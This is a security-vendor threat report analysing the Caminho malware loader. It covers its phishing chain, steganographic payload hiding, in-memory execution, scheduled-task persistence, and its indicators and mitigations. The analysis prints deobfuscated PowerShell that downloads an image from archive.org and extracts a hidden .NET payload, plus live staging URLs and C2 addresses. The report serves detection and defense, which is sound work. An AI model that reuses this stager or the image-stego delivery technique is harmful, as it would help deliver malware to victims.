Brazilian Caminho Loader Employs LSB Steganography and Fileless Execution to Deliver Multiple Malware Families Across South America, Africa, and Eastern Europe

Arctic Wolf has identified a new malware loader we’re calling Caminho, a Brazilian-origin Loader-as-a-Service operation that uses steganography to conceal .NET payloads within image files hosted on legitimate platforms.
6 min read

Summary

Arctic Wolf Labs has identified and analyzed a new malware loader we’re calling Caminho, a Brazilian-origin Loader-as-a-Service (LaaS) operation employing Least Significant Bit (LSB) steganography to conceal .NET payloads within image files hosted on legitimate platforms.

Active since at least March 2025, with a significant operational evolution in June 2025, the campaign has delivered a variety of malware and infostealers such as REMCOS RAT, XWorm and Katz Stealer to victims within multiple industries across South America, Africa, and Eastern Europe.

Extensive Portuguese-language code throughout all samples supports our high-confidence attribution of this operation to a Brazilian origin.

Key Takeaways

Initial Infection Chain:
The multi-stage infection chain begins with spear-phishing emails containing archived JavaScript (JS) or VBScript files using business-themed social engineering lures. Upon execution, the initial script retrieves an obfuscated PowerShell payload from pastebin-style services that downloads steganographic images from archive.org, a legitimate non-profit digital internet archive.

Loader:
The PowerShell next extracts a concealed .NET Loader (“Caminho” – Portugese for “path”) from the image using LSB steganography, loads it directly into memory, and invokes it with arguments specifying the final payload URL. The loader retrieves and injects the final malware into the calc.exe (a legitimate executable file used by Windows calculator) address space without writing files to disk, establishing persistence through scheduled tasks that re-execute the infection chain.

Loader Analysis:
Analysis of 71 Caminho Loader samples reveals consistent architectural patterns despite varying obfuscation, with all samples containing Portuguese-language strings and the distinctive HackForums[.]gigajew namespace artifact. The loader implements extensive anti-analysis checks including virtual machine (VM) and sandbox detection and debugging tool identification.

Business Model:
The operational pattern strongly indicates a Loader-as-a-Service business model rather than a single threat actor campaign. The standardized invocation interface accepts arbitrary payload URLs as arguments, allowing multiple customers to deploy different malware families using the same delivery infrastructure.

Payloads:
Observed payload diversity includes REMCOS RAT (Remote Control and surveillance), delivered via bulletproof hosting command-and-control (C2) infrastructure, XWorm delivered from malicious domains, and Katz Stealer, a credential-stealer documented by Nextron Systems in May 2025. Infrastructure analysis reveals reuse of identical steganographic images across campaigns with different final payloads, confirming the modular service architecture.

Victimography:
Confirmed victims to date span Brazil, South Africa, Ukraine, and Poland. The campaign timeline shows geographic expansion from South America to multi-continent operations. This coincides with the adoption of steganographic delivery mechanisms in June 2025 by the Caminho loader’s operators, suggesting operational maturity and possible customer base growth.

Attribution:
The Brazilian origin attribution is supported by extensive Portuguese-language code throughout all samples, targeting patterns focused on South American regions, and operational timing aligned with Brazilian business hours.

Brief MITRE ATT&CK® Information

Tactic Technique
Initial Access T1566.001 – Phishing: Spearphishing Attachment
Execution

T1059.001 – Command and Scripting Interpreter: PowerShell

T1059.007 – JavaScript

Defense Evasion

T1027 – Obfuscated Files or Information

T1027.003 – Steganography

T1055 – Process Injection

Persistence T1053.005 – Scheduled Task/Job: Scheduled Task

 

Weaponization and Technical Overview

Component Details
Weapons Multi-stage JavaScript loaders, PowerShell scripts with LSB steganography extraction, obfuscated .NET DLL (Caminho Loader), final payloads (REMCOS RAT, XWorm, Katz Stealer).
Attack Vector Spear-phishing attachments (RAR/ZIP archives containing JavaScript or VBS files), malicious OLE documents.
Network Infrastructure Archive.org for steganographic image hosting, paste.ee (legitimate site for sharing text snippets) for script staging, bulletproof hosting (AS214943 Railnet LLC) for C2 infrastructure.
Targets Multiple industries across South America, Africa, and Eastern Europe with confirmed victims in Brazil, South Africa, Ukraine, and Poland.

 

Technical Analysis

Context

The Caminho Loader campaign was first publicly documented in May 2025, when Nextron Systems published an analysis of “Katz Stealer”. Arctic Wolf’s investigation complements and further extends this analysis, revealing that this loader represents a broader operation with significantly more versatility. The loader has been deployed across multiple distinct campaigns, delivering diverse malicious payloads including REMCOS RAT, XWorm, and Katz Stealer, suggesting a Loader-as-a-Service model rather than a single-threat operation.

Our investigation into Caminho Loader began with analysis of a specific infection chain uploaded to VirusTotal from South Africa on July 4, 2025. This sample provided our initial entry point for understanding the full technical architecture of the operation. We have since learned that the most significant evolution in this campaign occurred a month earlier in early June 2025, when operators began employing LSB steganography to conceal malicious payloads within image files, marking a substantial advancement in their evasion capabilities.

What is Caminho Loader?

Caminho Loader is a .NET-based second-stage loader first observed in March 2025 (earliest VirusTotal submission: March 30, 2025). The loader’s primary function is to retrieve and execute arbitrary payloads in memory without writing executables to disk, thereby evading traditional file-based detection mechanisms. The loader implements extensive anti-analysis checks, including virtual machine (VM) detection, sandbox detection, and debugging tool identification.

The system for invoking functions and launching .NET DLLs remains strictly consistent across all samples despite variations in obfuscation and code structure. Threat actors can modify attack vectors and infection mechanisms while simply passing different URL arguments to the loader for payload retrieval. This modular design pattern indicates a loader-as-a-service (LaaS) business model.

What is Steganography?

Steganography is the art of hiding information within another message or object. The technique itself is at least 2,500 years old, and its practitioners have used a variety of inventive measures over the years to hide a message in a place where they hope it won’t be found.

As our means of communication have changed, so too has the practical application of this technique. In a computing context, hidden electronic communications may include steganographic coding inside a transport layer, such as a document file, image file, program, or protocol. For example, the sender might take an ordinary image file such as a photograph, and change the color of every hundredth pixel to correspond to a letter in the alphabet.

While steganography may have legitimate uses, such as digitally watermarking copyrighted content, malware and harmful code can be concealed in this fashion, weaponizing what might appear to the casual observer to be a harmless image or video file. Media files are perfect for steganographic techniques because of their typically larger file size. Because content altered in this way appears normal, it can bypass common cybersecurity measures and human checks.

 

Example of a phishing attack using steganography (Source: HTTPCS by Ziwit).

Attack Vector

The primary infection vector for this campaign involves spear-phishing emails containing compressed archives (RAR or ZIP format) with JavaScript or VBScript files as initial payloads. The archives use file names that are socially engineered to entice victims to open them. A fake invoice is one of the most common formats used for phishing, because the recipient’s concern of missing a financial payment or being required to make one invokes a sense of urgency.

Examples observed include:

  • IMG-04072025.rar (“IMG” in the filename implies image content)
  • XVIDEOSS_Nicole_Aniston_HD_20250928_203317.zip (“XVIDEO” is a typical adult content lure)
  • Other invoice and document-themed archives

In a specific campaign analyzed from July 2025, an email written in Portuguese that originated from the fictitious company office[at]ep-eps[.]com had an attachment titled RFQ-EPS.docx. The email targeted a victim in Brazil, based on VirusTotal submission data and email metadata. The attached OLE (Object Linking and Embedding) document contained embedded scripts designed to retrieve steganographic images from remote servers.

Figure 1: Phishing email containing malicious OLE document with Portuguese language content requesting a financial quote.

Alternative infection vectors observed include HTA (HTML Application) files that fetch subsequent stages from pastebin-style services. One observed HTA file connected to https[:]//pastefy[.]app/W8gaihTD/raw to retrieve an obfuscated script for the next execution stage.

Social engineering ploys consistently use business contexts to fool the target, with lures typically referencing quotations, invoices, time-sensitive payments, and other seemingly legitimate business themed documents. The threat actor relies on the targeted individual regularly opening these types of files as part of their day-to-day job, betting on their force of habit to override any natural caution they may have about opening an attachment from an unknown sender.

Stage 1: Initial JavaScript Dropper

Attribute Value
Hashes (SHA-256) 42761793d309a0e10b664de61fb25f8d915c65a86b4c5b6229c73d3992519fd5
ITW File Name IMG-04072025.js
File Type/Signature JavaScript
File Size 151,165 bytes

 

The initial JavaScript file employs heavy obfuscation using variable name randomization and string encoding to evade static analysis. Upon execution, the script performs HTTP GET requests to retrieve the next stage payload.

Figure 2: Deobfuscated code from the malicious file IMG-04072025.js showing network connection logic.

The deobfuscated code reveals the script connects to http[:]//paste[.]ee/d/BfcImbCm/0 to retrieve the second-stage script. It uses the MSXML2.ServerXMLHTTP object for HTTP communication and implements basic error handling for HTTP status codes (404, 403, 500).

Stage 2: PowerShell Retrieval Script

Attribute Value
Hashes (SHA-256) 134c29f52884adc5a3050e5c820229e060308e7377c7125805a6bfccd0859361
ITW File Name 378115664.js
Source URL https[:]//paste[.]ee/d/BfcImbCm/0
File Type JavaScript (PowerShell container)

 

This intermediate stage contains embedded PowerShell code with extreme obfuscation. The script’s primary function is to download a steganographic image file and extract the concealed malicious .NET payload.

Figure 3: Heavily obfuscated JavaScript retrieved from paste.ee containing embedded PowerShell (Click to enlarge).

The deobfuscated PowerShell performs the following operations:

1. Download steganographic image:

$emporetic = 'https[:]//archive[.]org/download/universe-1733359315202-8750/universe-1733359315202-8750[.]jpg'

$generation = $urethroscopical.DownloadData($emporetic)

2. Define BMP header signature for payload identification:

$nongeniuses = [byte[]](0x42, 0x4D, 0x72, 0x6E, 0x37, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, 0x64, 0x00, 0x00, 0x00, 0x4D, 0x2F, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3C, 0x6E, 0x37, 0x00, 0xC4, 0x0E, 0x00, 0x00, 0xC4, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00);

3. Search for BMP signature within the JPG:

$unvulgarize = -1;
for ($transportation = 0; $transportation - le $generation.Length - $nongeniuses.Length; $transportation++) {
    $scriptoriums = $true;
    for ($skunk = 0; $skunk - lt $nongeniuses.Length; $skunk++) {
        if ($generation[$transportation + $skunk] - ne $nongeniuses[$skunk]) {
            $scriptoriums = $touchous;
            Break
    }
    }
    if ($scriptoriums) {
    $unvulgarize = $transportation;
    break
    }
}
if ($unvulgarize - eq - 1) {
return
};

4. Extract embedded BMP containing .NET payload:

$verrucae = $generation[$unvulgarize..($generation.Length - 1)];
$biological = New - Object IO.MemoryStream;
$biological.Write($verrucae, 0, $verrucae.Length);
$biological.Seek(0, 'Begin') | Out - Null;
$plectonephric = [Drawing.Bitmap]::FromStream($biological);
$muffin = New - Object Collections.Generic.List[Byte];
for ($tazias = 0; $tazias - lt $plectonephric.Height; $tazias++) {
    for ($lidger = 0; $lidger - lt $plectonephric.Width; $lidger++) {
        $elayle = $plectonephric.GetPixel($lidger, $tazias);
        $muffin.Add($elayle.R);
        $muffin.Add($elayle.G);
        $muffin.Add($elayle.B)
    }
};
$pennywhistles = [BitConverter]::ToInt32($muffin.GetRange(0, 4).ToArray(), 0);
$felonies = $muffin.GetRange(4, $pennywhistles).ToArray();

The script is specifically tailored to a particular image file, as the byte signature serves as a unique identifier for payload location within the steganographic container. This design allows operators to use different images for different campaigns while maintaining the same extraction logic.

Figure 4: PowerShell code implementing LSB steganography extraction from image pixels.

The steganography implementation uses LSB extraction. The script loads the extracted BMP as a Bitmap object and iterates through every pixel, extracting the R, G, and B values. These color channel values encode the concealed binary data.

The first four bytes extracted from the steganographic data specify the length of the embedded payload, followed by the Base64-encoded .NET assembly.

Stage 3: Steganographic Image Container

Attribute Value
Hashes (SHA-256) 89959ad7b1ac18bbd1e850f05ab0b5fce164596bce0f1f8aafb70ebd1bbcf900
ITW File Name universe-1733359315202-8750.jpg
Source URL https[:]//archive[.]org/download/universe-1733359315202-8750/universe-1733359315202-8750[.]jpg
File Type JPEG image with embedded BMP data
First Observed June 5, 2025

 

Figure 5: Screenshot of publicly hosted image on archive.org containing hidden .NET loader, displayed as space/galaxy scene to victims (NOTE: Screenshot is sanitized and non-malicious).

The image file serves as a carrier for the concealed BMP file, which itself contains the .NET loader. Analysis of 58 steganographic samples we observed reveals consistent patterns:

  • Initial deployment used JPG format exclusively (June–July 2025)
  • PNG format adoption began early August 2025
  • Image sizes range from 3 MB to 11 MB to accommodate payload data
  • Legitimate hosting services (archive.org, file-sharing sites) are used extensively
  • The same image files are reused across multiple campaigns

The steganographic technique provides operational advantages. Without the specific extraction script, the images appear as normal graphics files with no obvious anomalies. The BMP payload embedded within the JPG/PNG container uses legitimate image file structures, avoiding structural format violations that might trigger analysis tools.

Figure 6: VirusTotal relation graph showing the same steganographic image used across multiple campaigns and infrastructure points.

Evidence suggests this particular image (SHA-256: 89959ad7b1ac18bbd1e850f05ab0b5fce164596bce0f1f8aafb70ebd1bbcf900) was deployed in at least four distinct OLE document campaigns and numerous JavaScript-based infections. This reuse pattern supports the Loader-as-a-Service hypothesis, where the steganographic component functions as a standardized module sold to multiple threat actors.

Stage 4: .NET Loader (Caminho)

Attribute Value
Hashes (SHA-256) c2bce00f20b3ac515f3ed3fd0352d203ba192779d6b84dbc215c3eec3a3ff19c
Hashes (MD5) 3a2c528535fb5717816b04ab459933c0
ITW File Name Microsoft.Win32.TaskScheduler.dll
Compilation Date 2025-06-30 17:00:59 UTC
Compiler .NET Framework v4.0.30319
File Type PE32 DLL
File Size 3,632,640 bytes (3.46 MB)

 

The .NET loader represents the core of the Caminho operation. Despite variations in obfuscation across samples, all versions share identical functional architecture and invocation patterns. The loader receives arguments via PowerShell invocation:

$intelligent.GetType('ClassLibrary1.Home').GetMethod('VAI').Invoke($null, $cordax)
$cordax = @(
    "==AMvQlRUR2bmhmMvQ2LlVmLlR3chB3LvoDc0RHa",  # Reversed + Base64 encoded URL
    "",
    "",
    "",
    "",
    "1",
    "calc",        # Target process for injection
    "",
    "",
    "C:\Users\Public\Downloads\",
    "panters",     # Persistence script name
    "js",
    "1",
    "1",
    "amandines",
    "2",
    ""
)

The first argument contains the URL for final payload retrieval, encoded using reversal and Base64. In this example, the decoded URL is http[:]//paste[.]ee/d/2hfodTFT/0, which delivers a REMCOS RAT payload.

Figure 7: Encoded data retrieved from paste.ee containing REMCOS RAT bytes.

The loader implements extensive anti-analysis capabilities, including:

  • Virtual machine detection (VMware, VirtualBox, Hyper-V)
  • Sandbox environment detection (Cuckoo, ANY.RUN, Joe Sandbox)
  • Debugging tool detection (OllyDbg, x64dbg, WinDbg, IDA)
  • Analysis process detection (ProcessHacker, Process Explorer, Wireshark)
  • Behavioral detection evasion (timing checks, user interaction requirements)

The loader validates payload architecture (x86 vs x64) before execution. This validation step includes error handling for invalid payloads, which is unusual for threat actors who control the entire execution chain. This design feature further supports the Loader-as-a-Service model, where the loader must handle payloads from different customers who may provide incorrectly formatted files.

Figure 8: Code from Caminho Loader validating payload architecture compatibility before execution.

The loader contains extensive Portuguese language artifacts:

  • Variable names:caminho” (path), “nomenativo” (native name), “persitencia” (persistence), “minutos” (minutes).
  • Function parameters using Portuguese terminology
  • Error messages in Portuguese
  • Comments in Portuguese

Figure 9: .NET loader contains numerous Portuguese-language variable names and strings indicating Brazilian origin.

After payload retrieval, the loader performs process injection into a legitimate Windows process (typically calc.exe or calc64.exe) to execute the final payload in memory. This “fileless” technique avoids writing the payload to disk, defeating file-based detection and forensic recovery.

Stage 5: Final Payload (REMCOS RAT Example)

Attribute Value
Hashes (SHA-256) 003cd08d0e4e3e53b5c2dd7e0ea292059f88f827d0cb025adf478d1f8e005fbd
Hashes (MD5) 83580969b9758ae2679b0f92a091db96
ITW File Name Microsoft.Win32.TaskScheduler.dll (masquerading)
Compilation Date 2025-05-06 19:18:40 UTC
Compiler MS Visual C++
File Type PE32 executable
File Size 499,712 bytes (488 KB)
C2 Address cestfinidns[.]vip (66.63.187[.]166)

 

The final payload in the analyzed infection chain is REMCOS RAT, a commercial remote access trojan. However, Caminho Loader has been observed delivering multiple different payload families including:

  • REMCOS RAT (multiple campaigns)
  • XWorm (observed August 2025)
  • Katz Stealer (documented by Nextron Systems)
  • Additional unidentified stealers and RATs

This payload diversity confirms the loader operates as an independent service supporting multiple distinct threat operations, rather than a single campaign by one group or operator.

Persistence Mechanism

Following successful payload execution, the loader establishes persistence through the Windows Task Scheduler. The loader writes a JavaScript file to C:\Users\Public\Downloads\panters.js that functions as a near-identical copy of the initial infection script.

Persistence Script:

Attribute Value
Hashes (SHA-256) a0e2b00951c6327788e3cc834a2d5294c2b7f94aad344ec132fe78b30cce18cc
Hashes (MD5) 3C751A9C652148B23521E06F23001132
ITW File Name panters.js
File Size 5,117 bytes
Location C:\Users\Public\Downloads\

 

The scheduled task named “amandes” executes panters.js every minute, ensuring payload re-execution after system reboot or process termination. This persistence mechanism maintains infection even if all running processes are terminated, as the scheduled task will trigger re-infection from the remote steganographic image and payload URLs (assuming they all remain online and accessible).

Figure 10: Complete infection chain showing multi-stage execution from initial JavaScript through steganographic extraction to final payload delivery.

Network Infrastructure

The Caminho Loader operation demonstrates sophisticated infrastructure management, combining legitimate services with dedicated malicious infrastructure.

Payload Hosting Infrastructure

Steganographic Image Hosting:

Domain IP Address ASN Service Type First/Last Seen
archive.org Multiple Internet Archive Legitimate file hosting June 2025 – Present
Ia601001.us[.]archive.org Multiple Internet Archive Archive.org CDN June 2025 – Present
Ia803206.us[.]archive.org Multiple Internet Archive Archive.org CDN August 2025 – Present
serverdata-cloud[.]cloud Not resolved Unknown Malicious infrastructure July 2025
files.catbox[.]moe Multiple catbox[.]moe Legitimate file hosting August 2025

 

The extensive use of the non-profit website Internet Archive (archive.org) represents an operational choice. Originally conceived as an archive of the world wide web, archive.org provides permanent, free file hosting with high availability and bandwidth. The service’s legitimate reputation allows malicious files to evade domain-based blocking and reputation systems.

Observed archive.org URLs include:

  • https[:]//archive[.]org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg
  • https[:]//dn721205[.]ca.archive[.]org/0/items/wp4096799-lost-in-space-wallpapers_202507/wp4096799-lost-in-space-wallpapers.jpg
  • https[:]//ia601001[.]us.archive[.]org/25/items/msi-pro-with-b-64_20250923/MSI_PRO_with_b64.png

The URL patterns suggest automated upload processes using timestamp-based naming conventions, indicating tooling for large-scale operations.

Script Staging Infrastructure:

Domain URL Pattern Service Type First/Last Seen
paste.ee /d/{ID}/0 Pastebin service July 2025 – Present
pastefy.app /{ID}/raw Pastebin service July 2025 – Present

 

Pastebin-style services host obfuscated JavaScript and PowerShell scripts for intermediate stages. These services provide several operational advantages:

  • No account verification required for posting
  • Content accessible via direct URLs without authentication
  • No file type restrictions
  • Difficult for defenders to proactively identify malicious content
  • Easy to rotate URLs for new campaigns

Observed paste.ee URLs delivering malicious payloads:

  • https[:]//paste[.]ee/d/BfcImbCm/0 (second-stage JavaScript)
  • https[:]//paste[.]ee/d/2hfodTFT/0 (REMCOS RAT payload)

Command and Control Infrastructure

REMCOS RAT C2:

Domain IP Address ASN Hosting Status
cestfinidns[.]vip 66.63.187[.]166 AS214943 Railnet LLC (virtualine[.]org) Active July 2025

 

The C2 infrastructure uses bulletproof hosting provider Railnet LLC (AS214943), which has linked associations with Russian-aligned cyber threat groups and its operations. This hosting choice indicates awareness of infrastructure resilience requirements and willingness to use providers with poor reputations.

Additional Observed Infrastructure:

Domain/IP Associated Sample Purpose
198.46.173[.]60 HTA campaign Script hosting
serverdata-cloud[.]cloud Multiple campaigns Image and payload hosting

Infrastructure Overlaps and Attribution

Network infrastructure analysis reveals connections to previously documented campaigns. The domain serverdata-cloud[.]cloud appears in multiple distinct Caminho campaigns, delivering both REMCOS and XWorm payloads. This domain hosts:

  • Steganographic container: https[:]//serverdata-cloud[.]cloud/output_image.bmp
  • XWorm payload: https[:]//serverdata-cloud[.]cloud/arquivo_6cf86d291e714ebbb9b685af41e74a4b.txt

The reuse of this infrastructure across campaigns with different final payloads provides solid evidence of Loader-as-a-Service operation, where multiple customers use the same delivery infrastructure but deploy their own final-stage malware.

Targets

Victim identification relies on VirusTotal submission data, email metadata from malicious documents, and telemetry patterns. The geographic distribution of confirmed victims spans multiple regions:

Confirmed Victim Locations:

  • Brazil: Primary target region, with multiple confirmed victims based on VT submissions from Brazilian IP ranges and Portuguese-language lure documents.
  • Multiple countries in Africa
  • Ukraine
  • Poland

The targeting appears opportunistic rather than industry-specific, with social engineering lures designed for general business contexts. No clear pattern emerges indicating specific sector focus beyond general corporate targeting.

Victim Submission Timeline:

Early submissions (March-May 2025) showed minimal geographic diversity, primarily concentrated in South America. Geographic expansion became apparent June-August 2025, coinciding with the introduction of steganographic delivery mechanisms and increased campaign volume. This timeline suggests operational maturation and possible expansion of the customer base for the Loader-as-a-Service offering.

The absence of targeting against high-profile organizations or critical infrastructure, combined with the use of generic business lures, suggests financially motivated cybercriminal operations rather than espionage or state-sponsored activity.

Attribution

Arctic Wolf assesses with high confidence that the Caminho Loader operation is linked to the Brazilian geographic region, with the following presented as evidence:

High Confidence Assessments

Brazilian Origin: Multiple lines of evidence support Brazilian Portuguese-speaking operators with high confidence.

Linguistic Evidence: Extensive Portuguese language strings throughout all 71 analyzed Caminho Loader samples, including:

  • Variable names in Portuguese
  • Error messages in Portuguese
  • Comments in Portuguese
  • Specific Brazilian Portuguese dialect markers

Targeting Patterns: Primary victim concentration in Brazil and broader South American regions, with lure documents using Portuguese language and Brazilian business contexts.

Operational Timing: Campaign activity patterns align with Brazilian business hours and holidays based on VT submission timestamps and infrastructure updates.

Code Artifacts: The namespace identifier HackForums[.]gigajew references English-language underground forums, but the consistent Portuguese language throughout the actual functional code indicates Brazilian development rather than simple tool adoption.

Conclusions

This investigation paints a colorful picture of Brazilian Portuguese-speaking threat actors operating a Loader-as-a-Service business model, as evidenced by extensive Portuguese-language code artifacts, targeting patterns focused on South American regions, and standardized modular architecture enabling multiple customers. The operation serves multiple downstream customers deploying REMCOS RAT, XWorm, and Katz Stealer, indicating commercial malware distribution for the purposes of financial gain rather than single-purpose or highly targeted campaigns.

Initial Caminho loader activity dates back to March 30, 2025, based on the earliest VirusTotal submissions we found. The operation underwent significant evolution in early June 2025, with the adoption of LSB steganography for payload concealment, marking a transition from simple encoded payloads to sophisticated image-based hiding techniques. Geographic expansion from South American operations to multi-continent targeting occurred June through August 2025, suggesting operational maturity. The campaign remains active as of October 2025, with continuous infrastructure rotation and obfuscation updates demonstrating sustained operational commitment.

Targets receive emails containing archived JavaScript or VBScript files that retrieve obfuscated PowerShell scripts from pastebin services. PowerShell downloads seemingly legitimate images from archive.org and extracts concealed .NET payloads using LSB steganography. The loader executes entirely in memory, injecting final payloads into legitimate Windows processes without writing files to disk. Persistence is achieved through scheduled tasks to ensure re-infection and the survival of system reboots. This architecture defeats traditional security controls relying on file-based detection, suspicious executable monitoring, and static analysis.

The deployment of diverse payload families including information stealers and remote access trojans supports credential theft, data exfiltration, and persistent system access for subsequent criminal activity. The investment in steganographic techniques, anti-analysis capabilities, and infrastructure diversity indicates professional development targeting long-term operational sustainability rather than opportunistic activity.

The extensive use of the Internet Archive non-profit site for payload hosting presents a policy challenge for traditional perimeter based defenses, as blanket blocking of archive.org may impact legitimate business operations, while selective URL blocking will ultimately prove ineffective against the operator’s demonstrated infrastructure rotation capabilities. The abuse of legitimate services for malicious infrastructure will likely continue, as threat actors recognize the detection evasion benefits provided by this technique.

How AI Can Detect Steganography-Based Threats

Steganography allows cybercriminals to hide malicious data inside files that most people would expect to be harmless. While traditional antivirus software can catch threats based on known virus signatures, heuristics, and behavioral analysis, it may not directly detect this type of hidden data.

The good news is that advanced security solutions powered by artificial intelligence (AI) can potentially identify signs of hidden data, especially if it is linked to malicious activities. AI uses deep learning algorithms, machine learning, and behavioral detection analytics to recognize hidden patterns that may not be visible to traditional antivirus software.

For example, AI can analyze file anomalies that indicate embedded hidden content. It can also conduct behavioral analysis, red-flagging unusual sharing patterns, or suspicious network activity. It uses pattern recognition to detect subtle alterations in digital media files that may be invisible to the human eye.

Arctic Wolf® Aurora™ Endpoint Security delivers AI-driven prevention, detection, and response (EDR) capabilities. Here’s how Arctic Wolf can help protect users from threats that use steganography to spread: 

  • Machine Learning: Leveraging an array of detection methodologies, including AI-powered machine learning, the Arctic Wolf Aurora™ Platform can quickly uncover suspicious and anomalous behaviors within collected data sets, such as suspicious file transfers or hidden network activity.
  • Zero-day threat prevention with immediate attack containment, to protect against steganographic attacks that arrive as zero-day threats.
  • Behavioral Detection Engine: Implements automatic response actions around the clock without the need for manual human intervention, reducing alert fatigue.
  • Detection and investigation capabilities: Including forensic data analysis, sandbox reports, and threat hunting. 
  • Alpha AI™ defends your endpoints from attacks—backed by 24×7 detection and response from one of the world’s largest commercial Security Operations Centers (SOCs).

Mitigation Recommendations

Organizations should implement layered controls to address the multi-stage nature of Caminho Loader attacks:

Email Security Controls:

  • Block JavaScript and VBScript files within archive attachments (RAR, ZIP, 7z).
  • Implement attachment sandboxing that can execute JavaScript and follow network connections.
  • Deploy email authentication (DMARC, SPF, DKIM) to reduce spoofing attacks.

Security Training:

  • Train users to recognize the red flags of social engineering patterns in financial quotes and invoice-themed emails.
  • Conduct regular phishing awareness tests, and foster a culture where employees aren’t afraid to speak up if they’ve opened an attachment they feel might be suspicious.
  • For those without the time to devote to creating security training resources from scratch, the Arctic Wolf Managed Security Awareness® training solution delivers easily digestible security lessons for employees, including regular phishing simulations and a “Report Phish” button.

Network Security Controls:

  • Monitor and control access to pastebin-style services (paste.ee, pastefy.app, pastebin.com, catbox.moe, tagbox.io).
  • Implement DNS filtering to block known bulletproof hosting ASNs (AS214943).
  • Consider blocking downloads from archive.org for non-business-justified use cases.
  • Monitor for unusual PowerShell network connections to legitimate services.

Endpoint Security Controls:

  • Enable PowerShell logging (Script Block Logging, Module Logging, Transcription).
  • Monitor for PowerShell with encoded commands or unusual image file processing.
  • Implement application allow listing to prevent execution from user-writable directories.
  • Enable memory scanning capabilities to detect in-memory payloads.
  • Enable LSA protection to reduce credential theft impact.
  • Invest in a modern endpoint detection and response (EDR) solution powered by AI, which can detect steganography via file and behavioral analysis and pattern recognition.

Detection and Monitoring:

  • Hunt for scheduled tasks created in user directories with JavaScript payloads.
  • Hunt for scheduled tasks executing JavaScript files residing in user directories (i.e. C:\Users\*)
  • Monitor calc.exe and calc64.exe for unusual network connections or child processes.
  • Detect process injection into legitimate processes.

How Arctic Wolf Protects Its Customers

Arctic Wolf is committed to ending cyber risk, and when new threat campaigns are identified we act decisively to protect our customers. Arctic Wolf Labs has leveraged threat intelligence around Caminho Loader activity to implement new detections in the Arctic Wolf® Aurora™ Platform to protect customers.

As we discover new information, we will enhance our detections to account for additional IOCs and techniques leveraged by the threat group behind this malicious activity.

APPENDIX

Indicators of Compromise (IOCs)

File Hashes

Initial Stage JavaScript/VBS Files: 

File Name/ Type SHA-256
IMG-04072025.js 42761793d309a0e10b664de61fb25f8d915c65a86b4c5b6229c73d3992519fd5
378115664.js (Stage 2) 134c29f52884adc5a3050e5c820229e060308e7377c7125805a6bfccd0859361
HTA File a6574dd934a98fc0421e771f30ad6db97af6714f919a6cc722f2213933b9e839
pastefy script

 

1d6e6f058ccb021143872bd068367bff6d665b742a34b2ad84d33e741d3841a8
panters.js (Persistence) a0e2b00951c6327788e3cc834a2d5294c2b7f94aad344ec132fe78b30cce18cc

 

Archive Files: 

File Name/ Type SHA-256
IMG-04072025.rar

 

592a21ec08f7f1755e4cb396da5e0d48ed6b9a3949c82ae6616eda95913416ee
XVIDEOSS_Nicole_Aniston_HD.zip I785e0078c193ae21cb83d108c28381ec1448afc929d6c2a30d865750ed4bce4d

 

Steganographic Image Files: 

File Name/ Type

 

SHA-256
universe-1733359315202-8750.jpg (most widely used) 89959ad7b1ac18bbd1e850f05ab0b5fce164596bce0f1f8aafb70ebd1bbcf900
wp4096799-lost-in-space-wallpapers.jpg 6291a85dd9c6288c9997c930cb243d29d671a1c3e0dbd6e0c2fb707355c400a3
11MB Ukraine sample 44d77dad67d9f0bf41999c3510dddb208889bcca22f56adbaf18945a08ba8984
First PNG format sample 6216afeff2697e4010be6f4a76646360114bd73d555901c91cf26828531f0c24
Base64 encoded (Not steganography) 418fec787e2c694eb7b1c8c5d5afcc023a88a53ed4d29bac8260ff49d3682671
Latest PNG sample b932adbdbb14644366daed1bede62d9293868c9a3eecbffc7c4e6604d6d5b243
BMP strip format 1ebab46691a0b5edd2b941c68180da9f6f38ca22b1de6c1804ccb0fda4956fe1

 

Caminho Loader Samples (.NET DLL): 

File Name/ Type

 

SHA-256
Primary analyzed sample c2bce00f20b3ac515f3ed3fd0352d203ba192779d6b84dbc215c3eec3a3ff19c
Lost in Space wallpaper extraction 780438284cea7d935c900df9b61529664c533762e1dbc9bbec3085e6c19448d1
Ukraine sample extraction 74b48909de2532080d55fc85fb7f24665d68701c1c59c910ee7ad5b83c86695d
PNG extraction August 2025 bbed1022d04cdfb0d11550ada9f5c1d0a9437839b1e42bb80e057438055a382c
September 2025 sample 6513a6862e7cd9494566e56b6ccf2a88727f442ed217b73dc878d0097e7b0343
Latest analyzed sample c3560bfa9483e7894243e613c55744b7f1705a53969f797f5fe8b2cb4fb336cc
Nextron Systems documented sample 0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7
First observed (March 30, 2025) 87c9bede1feac2e3810f3d269b4492fe0902e6303020171e561face400e9bdb4

 

Final Payloads:

File Name/ Type SHA-256

 

REMCOS RAT 003cd08d0e4e3e53b5c2dd7e0ea292059f88f827d0cb025adf478d1f8e005fbd
XWorm c5208189f4851b8ff525bf3cd74767e89af4ef256b256ed1143f4c8f3a48b01f

 

Network Indicators

Payload Staging URLs: 

http[:]//paste[.]ee/d/BfcImbCm/0
https[:]//paste[.]ee/d/2hfodTFT/0
https[:]//pastefy[.]app/W8gaihTD/raw
https[:]//198.46.173[.]60/arquivo_4353c11f6e74407a25e9fb10a09487e.txt
https[:]//serverdata-cloud[.]cloud/arquivo_6cf86d291e714ebbb9b685af41e74a4b.txt

 

Steganographic Image Hosting: 

https[:]//archive[.]org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg
https[:]//dn721205[.]ca.archive[.]org/0/items/wp4096799-lost-in-space-wallpapers_202507/wp4096799-lost-in-space-wallpapers.jpg
https[:]//ia601001[.]us.archive[.]org/25/items/msi-pro-with-b-64_20250923/MSI_PRO_with_b64.png
https[:]//ia803206[.]us.archive[.]org/14/items/msi_20250801/MSI.png
http[:]//files.catbox[.]moe/hejh36.jpg
https[:]//serverdata-cloud[.]cloud/output_image.bmp
http[:]//dn721709[.]ca.archive[.]org/0/items/optimized_msi_pro_with_b64_202509/optimized_MSI_PRO_with_b64.png

 

Command and Control:

cestfinidns[.]vip – 66.63.187[.]166 (REMCOS RAT C2)

Malicious Domains:

serverdata-cloud[.]cloud

IP Addresses:

